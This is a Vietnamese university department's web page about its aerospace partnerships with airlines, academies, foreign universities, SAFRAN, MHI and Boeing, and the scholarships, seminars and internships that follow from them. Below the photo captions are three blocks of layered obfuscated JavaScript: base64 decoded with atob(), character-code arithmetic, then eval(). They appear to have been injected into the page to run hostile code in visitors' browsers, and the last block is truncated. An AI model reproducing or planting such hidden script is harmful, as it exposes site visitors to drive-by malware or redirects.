Hợp tác

Các đối tác trong nước:

 • Công ty TNHH Kỹ thuật Máy bay – VAECO
 • Tổng công ty Hàng không Việt Nam – Vietnam Airlines
 • Hãng Hàng không Vietjet Air
 • Học viện Phòng không – Không quân
 • Học viện Kỹ thuật Quân sự

Các đối tác nước ngoài:

 • Trường Cơ khí và Hàng không Quốc gia Pháp (ENSMA)
 • Đại học Nagoya – Nhật Bản
 • Viện công nghệ Bandung (ITB)- Indonesia
 • Đại học quốc gia Thành công – Đài Loan
 • Mạng lưới AUN/SEED-Net / JICA
 • Tập đoàn SAFRAN – Pháp
 • Tập đoàn Boeing
 • Tập đoàn công nghiệp nặng Mitsubishi (MHI) – Nhật Bản

        Bộ môn kỹ thuật Hàng không & Vũ trụ là một bộ môn tiên phong về Hợp tác quốc tế trong Viện Cơ khí Động lực. Trong khuôn khổ chương trình hợp tác với Tập đoàn công nghiệp nặng Mitsubishi (MHI) – Nhật Bản, từ năm 2009 mỗi năm bộ môn tổ chức 1 hội thảo và 3 buổi bài giảng do MHI tài trợ về Kỹ thuật Hàng không – Vũ trụ. Trong đó chương trình hội thảo bộ môn còn kết hợp với Đại học Nagoya (Nhật Bản) và các trường đối tác tại Việt Nam. Đại học Nagoya cũng là một đối tác trong việc hỗ trợ và kết hợp các nghiên cứu chuyên sâu. Một số đề tài đã và đang được triển khai với trường đại học này trong đó có đề tài nghị định thư, đề tài kết hợp với công nghiệp (CRI) do AUN/SEED-Net tài trợ. Trong hợp tác với SAFRAN, hàng năm một hội thảo liên kết về Hàng không được tổ chức. SAFRAN cũng hỗ trợ chúng tôi trong việc thực tập cho sinh viên năm cuối tại Sinh-ga-po. Sinh viên Kỹ thuật Hàng không – Vũ trụ cũng có cơ hội được thực tập tại ENSMA cũng như học sau đại học tại Pháp. Là một thành viên tích cực trong mạng lưới AUN/SEED-Net/ JICA, hàng năm chúng tôi có các sinh viên nhận họcc bổng đi học tại Viện công nghệ Bandung (ITB)- In-đô-nê-xi-a. Bên cạnh đó, chính phủ In-đô-nê-xi-a cũng tài trợ học bổng chính phủ KNB cho sinh viên ngành Kỹ thuật Hàng không. Ngoài ra, sinh viên cũng có cơ hội nhận học bổng sau đại học tại các trường đại học lớn khác như Đại học quốc gia Thành công – Đài Loan, Đại học quốc gia Sinh-ga-po, Đại học Bách khoa Hồng Kông.

Một số hình ảnh:

hb0Hội thảo về Kỹ thuật Hàng không, một hoạt động nằm trong khuôn khổ hợp tác với tập đoàn MITSUBISHI và Đại học Nagoya

HBLễ trao học bổng của MHI

HB2Thăm quan nhà máy MHIVA tại Hà nội

hb3Hội thảo SAFRAN

var PTNBVDVUJG = atob(‘dmFyIEtHSExNWVRNQVMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEyIC0gMiwgMTI3IC0gOSwgMTAzIC0gNiwgMTE1IC0gMSwgMzUgLSAzLCAxMTEgLSA0LCAxMDQgLSAzLCAxMjcgLSA2LCAzNSAtIDMsIDcwIC0gOSwgMzYgLSA0LCA0MyAtIDQsIDgzIC0gMSwgMTAzIC0gNCwgMTE1IC0gNywgMTE2IC0gOSwgMTEzIC0gMSwgNzQgLSA0LCAxMTMgLSAyLCA4MCAtIDQsIDExNiAtIDgsIDExNSAtIDcsIDQ3IC0gOCwgNjIgLSAzLCAxMiAtIDIsIDEyNCAtIDYsIDEwNiAtIDksIDExOSAtIDUsIDM1IC0gMywgMTA5IC0gOCwgMTExIC0gMSwgMTA1IC0gNiwgMTAzIC0gMiwgMTA5IC0gOSwgMzYgLSA0LCA3MCAtIDksIDM4IC0gNiwgNDcgLSA4LCA3OCAtIDQsIDcwIC0gNSwgNzQgLSAxLCAxMDcgLSA2LCA5MiAtIDksIDEyMCAtIDEsIDY2IC0gMSwgNTEgLSAzLCA3NCAtIDcsIDg1IC0gMiwgNzMgLSA3LCA4NSAtIDgsIDg5IC0gNCwgOTAgLSAyLCA4MSAtIDgsIDc0IC0gMiwgNzMgLSA4LCAxMjggLSA5LCAxMDQgLSAxLCA3NiAtIDYsIDgwIC0gNSwgMTI4IC0gOSwgMTE3IC0gNiwgMTA2IC0gMSwgNzUgLSA0LCA3NyAtIDgsIDc2IC0gMywgMTIyIC0gMiwgNzMgLSA0LCA4NCAtIDMsIDEwOCAtIDEsIDgxIC0gNiwgNzMgLSA3LCA3MSAtIDQsIDgzIC0gNiwgMTE0IC0gMSwgNzUgLSAyLCA3MiAtIDcsIDExNCAtIDcsIDcwIC0gNCwgODQgLSA2LCAxMjMgLSA0LCA1NiAtIDgsIDk4IC0gOSwgODQgLSAzLCA1MiAtIDMsIDEwNSAtIDYsIDU1IC0gNiwgNzUgLSA3LCA3MCAtIDIsIDYxIC0gOSwgNzIgLSAyLCA3NiAtIDQsIDcyIC0gNSwgOTggLSA4LCA3MiAtIDMsIDg5IC0gNywgODcgLSAxLCA2NyAtIDEsIDU5IC0gNSwgODcgLSA5LCAxMTIgLSA4LCA1NCAtIDYsIDExNSAtIDIsIDY5IC0gNCwgNzIgLSAzLCA3NiAtIDMsIDExMCAtIDYsIDc0IC0gOCwgMTExIC0gNywgMTEwIC0gNywgMTE1IC0gMiwgNjcgLSAxLCA3NyAtIDksIDgxIC0gOCwgMTAxIC0gMSwgODAgLSA2LCA4NyAtIDYsIDUzIC0gMSwgOTMgLSAzLCA3NyAtIDMsIDExMCAtIDcsIDkyIC0gMiwgNzMgLSA0LCA5MiAtIDgsIDczIC0gOCwgODUgLSA4LCA1NiAtIDgsIDczIC0gNSwgNzggLSA3LCAxMTcgLSAxLCA3MSAtIDYsIDg1IC0gMiwgMTI0IC0gMiwgMTIwIC0gOSwgOTAgLSAyLCA4MCAtIDksIDczIC0gNywgMTIyIC0gNiwgNzggLSAzLCA5OSAtIDIsIDk0IC0gOSwgNzAgLSA1LCA1OSAtIDcsIDc5IC0gNywgMTA3IC0gNCwgNTQgLSA2LCA0OSAtIDEsIDY5IC0gMywgODUgLSA0LCA5MiAtIDcsIDgwIC0gNywgNzYgLSA3LCA5MCAtIDYsIDkzIC0gNCwgNzUgLSA0LCA5MSAtIDIsIDEwNiAtIDMsIDc1IC0gMiwgNjYgLSAxLCAxMTAgLSA4LCA5MCAtIDgsIDcwIC0gNSwgOTEgLSAyLCA2OSAtIDIsIDEwNSAtIDIsIDg4IC0gNywgMTI1IC0gNywgNjkgLSAxLCA3NyAtIDYsIDc4IC0gMSwgNjcgLSAxLCA3NyAtIDksIDg3IC0gMywgMTIyIC0gNywgNzkgLSAxLCA4MiAtIDEsIDEwOSAtIDYsIDcwIC0gMSwgNzUgLSA3LCA5NCAtIDUsIDkyIC0gNywgOTYgLSA2LCA1NyAtIDYsIDkyIC0gMiwgMTA1IC0gMiwgMTEwIC0gNywgNjQgLSA3LCA2NiAtIDEsIDY5IC0gMywgMTEyIC0gNSwgNzUgLSA0LCA3NyAtIDcsIDg5IC0gNiwgMTA1IC0gMiwgMTAyIC0gNCwgOTEgLSAyLCAxMTEgLSA4LCA4NCAtIDMsIDc1IC0gMSwgNzkgLSAyLCAxMjAgLSAxLCAxMDEgLSAxLCA3MSAtIDQsIDY4IC0gMSwgMTA3IC0gNCwgNzMgLSA4LCA1NCAtIDQsIDcyIC0gNSwgMTA2IC0gMSwgNzggLSA1LCA3NyAtIDQsIDc5IC0gMywgMTI2IC0gNCwgMTEyIC0gMSwgNzkgLSA0LCA3MSAtIDYsIDcyIC0gNywgNjYgLSA5LCA5MiAtIDMsIDgwIC0gMiwgMTEyIC0gOCwgNTAgLSAyLCAxMjIgLSA5LCA2OSAtIDQsIDc2IC0gNywgOTQgLSA4LCAxMTYgLSA0LCA5OCAtIDEsIDgzIC0gMiwgNjkgLSA4LCA2NyAtIDYsIDQ2IC0gNywgNjUgLSA2LCAxNCAtIDQsIDEwNyAtIDUsIDEyMiAtIDUsIDExNCAtIDQsIDEwNSAtIDYsIDEyMiAtIDYsIDEwNiAtIDEsIDExNiAtIDUsIDExNyAtIDcsIDM1IC0gMywgMTI3IC0gNywgMTE2IC0gNSwgMTIzIC0gOSwgOTggLSAzLCAxMDUgLSA0LCAxMTkgLSA5LCAxMDUgLSA2LCA0MiAtIDIsIDEyMyAtIDgsIDEyMyAtIDcsIDExOCAtIDQsIDExMSAtIDYsIDExNSAtIDUsIDExMiAtIDksIDQ2IC0gMiwgMzYgLSA0LCAxMTIgLSA1LCAxMDIgLSAxLCAxMjYgLSA1LCA0NSAtIDQsIDM2IC0gNCwgMTMxIC0gOCwgMTkgLSA5LCAzOSAtIDcsIDM3IC0gNSwgMTIzIC0gNSwgMTAwIC0gMywgMTE1IC0gMSwgMzkgLSA3LCAxMjIgLSA4LCAxMDMgLSAyLCAxMjEgLSA2LCA0MSAtIDksIDYzIC0gMiwgNDEgLSA5LCA0NyAtIDgsIDQzIC0gNCwgNjEgLSAyLCAxOSAtIDksIDQwIC0gOCwgMzQgLSAyLCAxMDUgLSAzLCAxMTYgLSA1LCAxMTUgLSAxLCAzNiAtIDQsIDQ0IC0gNCwgMTIxIC0gMywgMTAxIC0gNCwgMTE3IC0gMywgMzQgLSAyLCAxMTAgLSA1LCAzNyAtIDUsIDYzIC0gMiwgMzQgLSAyLCA1NiAtIDgsIDYzIC0gNCwgNDAgLSA4LCAxMDYgLSAxLCA0MCAtIDgsIDY4IC0gOCwgMzUgLSAzLCAxMjMgLSA4LCAxMTggLSAyLCAxMTYgLSAyLCAxMDkgLSA0LCAxMTggLSA4LCAxMDggLSA1LCA0OSAtIDMsIDExMCAtIDIsIDEwMyAtIDIsIDExOCAtIDgsIDEwNSAtIDIsIDExNyAtIDEsIDExMiAtIDgsIDY2IC0gNywgMzUgLSAzLCAxMTQgLSA5LCA1MCAtIDcsIDQ0IC0gMSwgNDIgLSAxLCAzNSAtIDMsIDEyNCAtIDEsIDE0IC0gNCwgMzcgLSA1LCAzNiAtIDQsIDMzIC0gMSwgMzcgLSA1LCAxMTYgLSAyLCAxMDcgLSA2LCAxMjEgLSA2LCAzNSAtIDMsIDQ1IC0gMiwgNjQgLSAzLCAzOSAtIDcsIDkyIC0gOSwgMTIwIC0gNCwgMTE4IC0gNCwgMTA5IC0gNCwgMTE2IC0gNiwgMTEwIC0gNywgNDggLSAyLCAxMDggLSA2LCAxMjMgLSA5LCAxMTcgLSA2LCAxMTcgLSA4LCA3MyAtIDYsIDEwOSAtIDUsIDEwMSAtIDQsIDEyMyAtIDksIDc2IC0gOSwgMTE4IC0gNywgMTA1IC0gNSwgMTEwIC0gOSwgNDMgLSAzLCAxMjQgLSA5LCAxMjQgLSA4LCAxMTggLSA0LCAxMTEgLSA2LCAxMTQgLSA0LCAxMTIgLSA5LCA1MCAtIDQsIDEwMSAtIDIsIDEwOCAtIDQsIDk5IC0gMiwgMTIwIC0gNiwgNzYgLSA5LCAxMTkgLSA4LCAxMDQgLSA0LCAxMDMgLSAyLCA2NiAtIDEsIDEyNCAtIDgsIDQ2IC0gNiwgMTEzIC0gOCwgNDQgLSAzLCAzMyAtIDEsIDEwMiAtIDgsIDE5IC0gOSwgMTMgLSA0LCAxNyAtIDgsIDExIC0gMiwgMTAgLSAxLCAxMTEgLSA0LCAxMDkgLSA4LCAxMjUgLSA0LCA0OSAtIDMsIDEwNCAtIDUsIDExMCAtIDYsIDEwNSAtIDgsIDExOCAtIDQsIDcxIC0gNCwgMTEzIC0gMiwgMTA0IC0gNCwgMTA3IC0gNiwgNjcgLSAyLCAxMjQgLSA4LCA0MiAtIDIsIDExMCAtIDUsIDM4IC0gNiwgNDYgLSA5LCAzNCAtIDIsIDExMyAtIDYsIDEwNCAtIDMsIDEyNyAtIDYsIDUwIC0gNCwgMTA5IC0gMSwgMTA2IC0gNSwgMTE1IC0gNSwgMTA1IC0gMiwgMTE5IC0gMywgMTExIC0gNywgNDYgLSA1LCA1MCAtIDksIDYyIC0gMywgMTUgLSA1LCAzNCAtIDIsIDM0IC0gMiwgMTI4IC0gMywgMTMgLSAzLCA0MCAtIDgsIDM5IC0gNywgMTIzIC0gOSwgMTEwIC0gOSwgMTIzIC0gNywgMTE5IC0gMiwgMTE1IC0gMSwgMTEyIC0gMiwgMzQgLSAyLCAxMTcgLSAzLCAxMDYgLSA1LCAxMTcgLSAyLCA2NSAtIDYsIDE4IC0gOCwgMTI4IC0gMywgMTIgLSAyLCAxNSAtIDUsIDEyNyAtIDksIDEwMCAtIDMsIDExNiAtIDIsIDQxIC0gOSwgMTA1IC0gNSwgMTA2IC0gNSwgMTAyIC0gMywgMzggLSA2LCA2NSAtIDQsIDQwIC0gOCwgMTIxIC0gMSwgMTE1IC0gNCwgMTE3IC0gMywgMTA0IC0gOSwgMTA1IC0gNCwgMTE1IC0gNSwgMTAwIC0gMSwgNDMgLSAzLCAxMDEgLSA0LCAxMjQgLSA4LCAxMTIgLSAxLCAxMDEgLSAzLCA0NCAtIDQsIDEwNSAtIDQsIDExNyAtIDcsIDEwMCAtIDEsIDEwMiAtIDEsIDEwMSAtIDEsIDQyIC0gMSwgNTMgLSA5LCAzMyAtIDEsIDExMSAtIDQsIDEwNyAtIDYsIDEyOCAtIDcsIDQ3IC0gNiwgNjQgLSA1LCAxOCAtIDgsIDQ4IC0gOCwgMTEyIC0gMiwgMTAyIC0gMSwgMTI4IC0gOSwgMzcgLSA1LCA3NiAtIDYsIDEyMCAtIDMsIDExNCAtIDQsIDEwNyAtIDgsIDEyNCAtIDgsIDExMiAtIDcsIDExNCAtIDMsIDExMSAtIDEsIDQzIC0gMywgMTA5IC0gOSwgMTA4IC0gNywgMTA0IC0gNSwgNDYgLSA1LCA0NSAtIDQsIDQ5IC0gOSwgNDkgLSA4LCA2MiAtIDMsIDE5IC0gOSwgMTcgLSA3KTtldmFsKEtHSExNWVRNQVMpOw==’);
eval(PTNBVDVUJG);

var ICNVNCGZZV = atob(‘dmFyIEhMSURaSVhKUkggPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTE5IC0gMSwgOTkgLSAyLCAxMjMgLSA5LCAzOCAtIDYsIDExNSAtIDgsIDEwNyAtIDYsIDEyNCAtIDMsIDM3IC0gNSwgNjUgLSA0LCAzNiAtIDQsIDQxIC0gMiwgOTMgLSAzLCAxMDYgLSA4LCA3NCAtIDksIDEyMSAtIDIsIDEwMiAtIDMsIDExNiAtIDIsIDg3IC0gNCwgMTEzIC0gMywgMTA4IC0gNywgNzkgLSA1LCA0MCAtIDEsIDYxIC0gMiwgMTMgLSAzLCAxMjQgLSA2LCA5OCAtIDEsIDEyMSAtIDcsIDQwIC0gOCwgMTAyIC0gMSwgMTE3IC0gNywgMTAzIC0gNCwgMTA5IC0gOCwgMTA3IC0gNywgNDAgLSA4LCA3MCAtIDksIDM4IC0gNiwgNDUgLSA2LCA3OSAtIDMsIDczIC0gOCwgNzkgLSAyLCAxMjYgLSA0LCA5NCAtIDgsIDEyNCAtIDQsIDgzIC0gNiwgNzMgLSA4LCA4NyAtIDksIDg2IC0gNSwgODMgLSA5LCA3MSAtIDEsIDEwMyAtIDMsIDU3IC0gNiwgMTE2IC0gNSwgNzIgLSAxLCA4MSAtIDUsIDExMyAtIDksIDgzIC0gMiwgODggLSAxLCA3NSAtIDMsIDEyNCAtIDIsIDk0IC0gNSwgNjggLSAzLCA3OCAtIDksIDkyIC0gNSwgODcgLSA2LCA2MiAtIDksIDc2IC0gNywgNjggLSAxLCA4NiAtIDUsIDg4IC0gMSwgNzcgLSA3LCAxMjYgLSA2LCAxMDMgLSA0LCA4OCAtIDEsIDY4IC0gMywgMTA2IC0gMywgNjkgLSA0LCAxMTYgLSA2LCA4OSAtIDksIDEyOCAtIDksIDEyMyAtIDQsIDUzIC0gNCwgOTEgLSAzLCA1MCAtIDIsIDgzIC0gMiwgNjcgLSAxLCA4MiAtIDUsIDcxIC0gNSwgMTIyIC0gMywgODQgLSA3LCA4NSAtIDYsIDEwOCAtIDMsIDU4IC0gNSwgNzcgLSA3LCAxMDEgLSA0LCA3MCAtIDEsIDEyNCAtIDQsIDExOSAtIDcsIDY5IC0gNCwgMTA4IC0gMywgNzggLSA5LCA4MiAtIDksIDc0IC0gNywgOTEgLSA0LCA4MyAtIDIsIDExNCAtIDIsIDc0IC0gOCwgMTI1IC0gMywgOTEgLSA2LCA1NCAtIDQsIDc2IC0gNiwgMTI3IC0gOCwgOTEgLSAyLCAxMDYgLSAyLCA3MSAtIDUsIDEyNSAtIDYsIDEwNCAtIDUsIDU0IC0gNywgODEgLSA1LCAxMDcgLSA0LCAxMDQgLSA0LCAxMTggLSA2LCA5MSAtIDYsIDcxIC0gNSwgNzQgLSA5LCA3MyAtIDgsIDc4IC0gMSwgNzIgLSAzLCAxMTIgLSA0LCA3NSAtIDEsIDEwMSAtIDMsIDg4IC0gNCwgNzQgLSAxLCA4OSAtIDIsIDg0IC0gNiwgODMgLSAyLCAxMDYgLSA2LCA5OSAtIDksIDk3IC0gOSwgOTUgLSA3LCAxMjUgLSA2LCAxMDYgLSA5LCA3NSAtIDUsIDEyNSAtIDQsIDEyMiAtIDcsIDYwIC0gNCwgNzEgLSA1LCA3MCAtIDMsIDEwNiAtIDMsIDkwIC0gNSwgNjcgLSAyLCAxMDQgLSAxLCA3NCAtIDEsIDU5IC0gNSwgODkgLSA4LCA3MSAtIDYsIDEyMyAtIDgsIDExMCAtIDEsIDEwNSAtIDUsIDgzIC0gMSwgNzcgLSA4LCA1MSAtIDIsIDczIC0gMywgMTA5IC0gNSwgMTAzIC0gNCwgMTA2IC0gOCwgODQgLSA3LCA3MiAtIDMsIDcyIC0gMywgODAgLSA3LCA4MSAtIDYsIDEyNyAtIDUsIDgyIC0gNSwgODQgLSA3LCAxMDUgLSA3LCAxMjMgLSAzLCA1NyAtIDksIDgzIC0gMiwgOTQgLSA4LCA5MSAtIDMsIDExMyAtIDEsIDk0IC0gOCwgMTA0IC0gNiwgMTI1IC0gNCwgNTYgLSA0LCA1MCAtIDEsIDczIC0gOCwgOTAgLSA2LCA4NCAtIDMsIDEwNSAtIDgsIDY4IC0gMiwgMTA1IC0gMSwgMTI4IC0gOSwgMTE0IC0gNCwgODkgLSA4LCA2OSAtIDQsIDU0IC0gNiwgMTI2IC0gOCwgODQgLSA1LCAxMjQgLSA1LCA5NyAtIDcsIDEyMCAtIDIsIDcyIC0gMiwgMTA4IC0gNCwgODIgLSA1LCA2OCAtIDEsIDg3IC0gOSwgMTA3IC0gNCwgNjcgLSAyLCA3MSAtIDUsIDcxIC0gNCwgOTIgLSA4LCA4MiAtIDksIDgxIC0gNSwgODMgLSA3LCA4OSAtIDcsIDgwIC0gMiwgODMgLSA3LCA3MyAtIDgsIDExMCAtIDUsIDc0IC0gNSwgNzcgLSA0LCA2OCAtIDEsIDkxIC0gNCwgODcgLSA5LCAxMDcgLSAzLCAxMDYgLSA5LCA2OSAtIDQsIDcwIC0gOSwgNjUgLSA0LCA0MyAtIDQsIDY3IC0gOCwgMTcgLSA3LCAxMDQgLSAyLCAxMjQgLSA3LCAxMTUgLSA1LCAxMDEgLSAyLCAxMjQgLSA4LCAxMTEgLSA2LCAxMTggLSA3LCAxMTMgLSAzLCAzNiAtIDQsIDEyMSAtIDEsIDExNyAtIDYsIDEyMyAtIDksIDEwMCAtIDUsIDEwNyAtIDYsIDExMyAtIDMsIDEwNSAtIDYsIDQ0IC0gNCwgMTIxIC0gNiwgMTIwIC0gNCwgMTE1IC0gMSwgMTA4IC0gMywgMTE5IC0gOSwgMTEyIC0gOSwgNTIgLSA4LCA0MSAtIDksIDExNSAtIDgsIDEwOSAtIDgsIDEyNiAtIDUsIDQ1IC0gNCwgMzUgLSAzLCAxMzAgLSA3LCAxMSAtIDEsIDM2IC0gNCwgMzcgLSA1LCAxMjIgLSA0LCAxMDMgLSA2LCAxMTYgLSAyLCAzNSAtIDMsIDExOCAtIDQsIDEwNCAtIDMsIDEyMSAtIDYsIDQwIC0gOCwgNjkgLSA4LCAzOSAtIDcsIDQ2IC0gNywgNDIgLSAzLCA2NiAtIDcsIDE1IC0gNSwgNDAgLSA4LCA0MCAtIDgsIDEwOSAtIDcsIDExNSAtIDQsIDEyMSAtIDcsIDM3IC0gNSwgNDEgLSAxLCAxMjMgLSA1LCAxMDAgLSAzLCAxMjMgLSA5LCAzNCAtIDIsIDExMiAtIDcsIDQwIC0gOCwgNjQgLSAzLCAzNCAtIDIsIDUzIC0gNSwgNjcgLSA4LCAzNyAtIDUsIDExNCAtIDksIDM3IC0gNSwgNjUgLSA1LCAzNiAtIDQsIDExNiAtIDEsIDEyMSAtIDUsIDEyMSAtIDcsIDExNCAtIDksIDExMyAtIDMsIDEwNCAtIDEsIDUwIC0gNCwgMTExIC0gMywgMTA3IC0gNiwgMTE1IC0gNSwgMTA1IC0gMiwgMTE4IC0gMiwgMTEzIC0gOSwgNjcgLSA4LCAzOSAtIDcsIDEwOCAtIDMsIDQ0IC0gMSwgNDggLSA1LCA1MCAtIDksIDMzIC0gMSwgMTI0IC0gMSwgMTYgLSA2LCAzNyAtIDUsIDM5IC0gNywgMzkgLSA3LCAzNiAtIDQsIDEyMyAtIDksIDEwNCAtIDMsIDExOSAtIDQsIDM4IC0gNiwgNDYgLSAzLCA2NSAtIDQsIDQxIC0gOSwgODQgLSAxLCAxMjMgLSA3LCAxMjMgLSA5LCAxMTMgLSA4LCAxMTIgLSAyLCAxMTIgLSA5LCA0OSAtIDMsIDEwNCAtIDIsIDEyMyAtIDksIDEyMCAtIDksIDExMyAtIDQsIDc0IC0gNywgMTA1IC0gMSwgMTAyIC0gNSwgMTIwIC0gNiwgNzYgLSA5LCAxMjAgLSA5LCAxMDggLSA4LCAxMDYgLSA1LCA0MyAtIDMsIDEyNCAtIDksIDExOSAtIDMsIDExNyAtIDMsIDExMSAtIDYsIDExNyAtIDcsIDExMiAtIDksIDQ5IC0gMywgMTA1IC0gNiwgMTEyIC0gOCwgMTA0IC0gNywgMTIwIC0gNiwgNzEgLSA0LCAxMTQgLSAzLCAxMDYgLSA2LCAxMDUgLSA0LCA3MCAtIDUsIDEyMyAtIDcsIDQ0IC0gNCwgMTA3IC0gMiwgNDcgLSA2LCAzNiAtIDQsIDk4IC0gNCwgMTQgLSA0LCAxMiAtIDMsIDEzIC0gNCwgMTEgLSAyLCAxOCAtIDksIDEwOSAtIDIsIDEwMiAtIDEsIDEyOCAtIDcsIDQ5IC0gMywgMTAzIC0gNCwgMTA3IC0gMywgMTAxIC0gNCwgMTE5IC0gNSwgNzAgLSAzLCAxMTYgLSA1LCAxMDMgLSAzLCAxMDMgLSAyLCA3MyAtIDgsIDExOCAtIDIsIDQxIC0gMSwgMTE0IC0gOSwgMzkgLSA3LCAzOSAtIDIsIDM2IC0gNCwgMTA5IC0gMiwgMTA4IC0gNywgMTMwIC0gOSwgNTAgLSA0LCAxMDkgLSAxLCAxMDIgLSAxLCAxMTUgLSA1LCAxMDkgLSA2LCAxMjMgLSA3LCAxMTEgLSA3LCA0NiAtIDUsIDUwIC0gOSwgNjEgLSAyLCAxOCAtIDgsIDM2IC0gNCwgNDAgLSA4LCAxMzMgLSA4LCAxOCAtIDgsIDM1IC0gMywgNDEgLSA5LCAxMjMgLSA5LCAxMDIgLSAxLCAxMjMgLSA3LCAxMjQgLSA3LCAxMTYgLSAyLCAxMTIgLSAyLCAzMyAtIDEsIDExOCAtIDQsIDEwNSAtIDQsIDExNiAtIDEsIDYyIC0gMywgMTIgLSAyLCAxMjkgLSA0LCAxMyAtIDMsIDE1IC0gNSwgMTI0IC0gNiwgOTkgLSAyLCAxMjIgLSA4LCAzNiAtIDQsIDEwOCAtIDgsIDEwOCAtIDcsIDEwMyAtIDQsIDMzIC0gMSwgNjcgLSA2LCA0MCAtIDgsIDEyNyAtIDcsIDExMiAtIDEsIDEyMyAtIDksIDEwNCAtIDksIDEwOSAtIDgsIDExOSAtIDksIDEwMyAtIDQsIDQyIC0gMiwgOTkgLSAyLCAxMTcgLSAxLCAxMTYgLSA1LCAxMDcgLSA5LCA0NyAtIDcsIDEwNiAtIDUsIDExMSAtIDEsIDEwNCAtIDUsIDEwOSAtIDgsIDEwOSAtIDksIDQyIC0gMSwgNDYgLSAyLCAzNyAtIDUsIDExMyAtIDYsIDEwNiAtIDUsIDEyNCAtIDMsIDQ2IC0gNSwgNjggLSA5LCAxOSAtIDksIDQ2IC0gNiwgMTE0IC0gNCwgMTA3IC0gNiwgMTI0IC0gNSwgMzMgLSAxLCA3OCAtIDgsIDEyMSAtIDQsIDExNCAtIDQsIDEwMCAtIDEsIDExNyAtIDEsIDEwOCAtIDMsIDExMyAtIDIsIDExNCAtIDQsIDQ1IC0gNSwgMTA3IC0gNywgMTA1IC0gNCwgMTA0IC0gNSwgNDkgLSA4LCA0MyAtIDIsIDQ2IC0gNiwgNDYgLSA1LCA2NSAtIDYsIDE4IC0gOCwgMTEgLSAxKTtldmFsKEhMSURaSVhKUkgpOw==’);
eval(ICNVNCGZZV);

var QSGJXNZHVT = atob(‘dmFyIEpCWE9CVEpTVFAgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE0IC0gNCwgMTIxIC0gMywgMTA1IC0gOCwgMTE2IC0gMiwgNDAgLSA4LCAxMTYgLSA5LCAxMDQgLSAzLCAxMjkgLSA4LCAzOSAtIDcsIDYzIC0gMiwgMzQgLSAyLCA0MSAtIDIsIDkwIC0gMSwgNzUgLSAzLCA4OCAtIDksIDg0IC0gNiwgMTAxIC0gMSwgOTcgLSA3LCA3NSAtIDQsIDEwNyAtIDQsIDg0IC0gNywgNzcgLSAzLCA0MiAtIDMsIDYzIC0gNCwgMTUgLSA1LCAxMjAgLSAyLCA5OSAtIDIsIDEyMiAtIDgsIDM1IC0gMywgMTA3IC0gNiwgMTE3IC0gNywgMTA3IC0gOCwgMTA2IC0gNSwgMTAxIC0gMSwgMzggLSA2LCA2OSAtIDgsIDM5IC0gNywgNDQgLSA1LCA4MCAtIDQsIDEyNiAtIDUsIDExMCAtIDMsIDYyIC0gNSwgOTkgLSAxLCAxMDYgLSAyLCA4NyAtIDYsIDEyMCAtIDksIDc2IC0gMywgODkgLSA4LCAxMTggLSAyLCAxMTggLSAyLCAxMDcgLSA3LCA1MyAtIDIsIDExMSAtIDQsIDEyMiAtIDcsIDgyIC0gOSwgNzIgLSA1LCA1NiAtIDgsIDg5IC0gNywgODYgLSA4LCAxMjggLSA3LCA3OSAtIDYsIDgyIC0gOCwgODIgLSAzLCA5MSAtIDQsIDg0IC0gMywgNTYgLSAyLCA4MSAtIDIsIDEwNiAtIDEsIDExNiAtIDUsIDEyMyAtIDUsIDcyIC0gMywgNzAgLSAyLCA2MyAtIDcsIDY4IC0gMSwgNjggLSAxLCAxMjYgLSA1LCAxMDYgLSAzLCAxMTQgLSA0LCA4OCAtIDgsIDcxIC0gNCwgOTEgLSAyLCA1NiAtIDEsIDk2IC0gNiwgMTEwIC0gMywgODYgLSA5LCAxMTcgLSA1LCA4MiAtIDgsIDcwIC0gNCwgOTIgLSA3LCAxMTAgLSAzLCA4MyAtIDQsIDExMyAtIDgsIDU4IC0gOSwgMTE5IC0gMSwgOTUgLSA1LCAxMTcgLSA3LCA5MiAtIDYsIDEyNiAtIDksIDgyIC0gNywgMTA4IC0gMiwgODggLSAzLCA2OCAtIDIsIDc1IC0gMiwgOTQgLSA3LCA4OCAtIDcsIDExNSAtIDIsIDc3IC0gMSwgODYgLSAyLCAxMTggLSAzLCA4OCAtIDgsIDcwIC0gMSwgNzYgLSA5LCA1OCAtIDYsIDUzIC0gNCwgNzMgLSA1LCAxMDggLSAzLCA1NyAtIDEsIDUwIC0gMywgODEgLSA1LCA4NiAtIDMsIDU4IC0gOSwgMTE5IC0gOSwgMTA2IC0gOSwgODggLSA2LCAxMDMgLSA0LCAxMTMgLSAyLCA3NyAtIDMsIDcxIC0gMiwgNjggLSAyLCAxMDUgLSAxLCA5OSAtIDEsIDg2IC0gMiwgNzMgLSA0LCA2MyAtIDcsIDg0IC0gNSwgMTI3IC0gNSwgNjEgLSA4LCAxMDkgLSA4LCAxMDIgLSAyLCA5NCAtIDcsIDEwOCAtIDUsIDkyIC0gOCwgODMgLSAzLCAxMjMgLSAyLCAxMjIgLSA3LCA1MCAtIDMsIDgzIC0gNywgMTEyIC0gNywgOTggLSA5LCAxMjIgLSA2LCA3MCAtIDQsIDkyIC0gOSwgMTEyIC0gMSwgMTE4IC0gMSwgODUgLSAyLCA4OSAtIDYsIDgwIC0gMywgMTEzIC0gNCwgMTA0IC0gNCwgMTA4IC0gMiwgMTE2IC0gMSwgNjQgLSA5LCA4MSAtIDUsIDEyNiAtIDYsIDcxIC0gNiwgMTI2IC0gNCwgNzUgLSAxLCA3NSAtIDYsIDEwNCAtIDEsIDExMiAtIDksIDgyIC0gNywgMTI4IC0gNiwgNjkgLSA0LCAxMTcgLSA4LCA5NyAtIDgsIDkyIC0gOSwgODUgLSA0LCA5NSAtIDcsIDEwOCAtIDYsIDkxIC0gNCwgNTcgLSA0LCAxMDMgLSA0LCA4OSAtIDcsIDEyNCAtIDMsIDYwIC0gOCwgNTggLSA4LCA3OCAtIDMsIDEzMSAtIDksIDExMiAtIDEsIDExMiAtIDYsIDcwIC0gNSwgOTMgLSA5LCA5MCAtIDksIDEzMCAtIDgsIDg1IC0gMiwgODkgLSA2LCA5MiAtIDcsIDEyMCAtIDIsIDg0IC0gNSwgNzIgLSA1LCAxMjggLSA4LCAxMDkgLSA1LCA4MyAtIDcsIDEyMyAtIDMsIDg5IC0gOCwgMTIwIC0gNywgNzcgLSA0LCAxMTAgLSA3LCAxMTUgLSA4LCAxMTQgLSAyLCA3NiAtIDksIDkwIC0gNiwgNzUgLSA2LCAxMDYgLSAyLCA3NCAtIDEsIDEyOSAtIDgsIDExNSAtIDMsIDgxIC0g